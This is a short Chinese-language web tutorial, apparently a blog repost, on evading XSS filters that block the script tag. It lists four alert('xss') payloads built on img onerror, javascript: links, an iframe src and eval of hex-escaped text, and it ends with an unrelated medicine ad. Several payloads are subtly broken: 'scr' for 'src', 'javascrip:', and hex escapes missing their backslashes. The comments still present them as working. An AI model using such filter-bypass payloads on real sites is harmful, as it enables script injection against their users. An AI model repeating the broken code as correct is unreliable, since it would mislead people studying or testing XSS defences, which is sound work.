XSS

0×04 过滤的解决办法

假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,

这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,

只要能运行我们的js就OK,比如用img标签或者a标签。我们可以这样写

  1. <img scr=1 onerror=alert('xss')>                                                                                                                          //  当找不到图片名为1的文件时,执行alert('xss')  
  2. <a href=javascrip:alert('xss')>s</a>                                                                                                                      //   点击s时运行alert('xss')  
  3. <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>                                                                           //    利用iframe的scr来弹窗  
  4. <img src="1" onerror=eval("x61x6cx65x72x74x28x27x78x73x73x27x29")></img>                               //   过滤了alert来执行弹窗   

等等有很多的方法,不要把思想总局限于一种上面,

记住一句话“xss就是在页面执行你想要的js”其他的管他去。(当然有的时候还有管他…)

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/unixcs/p/10551537.html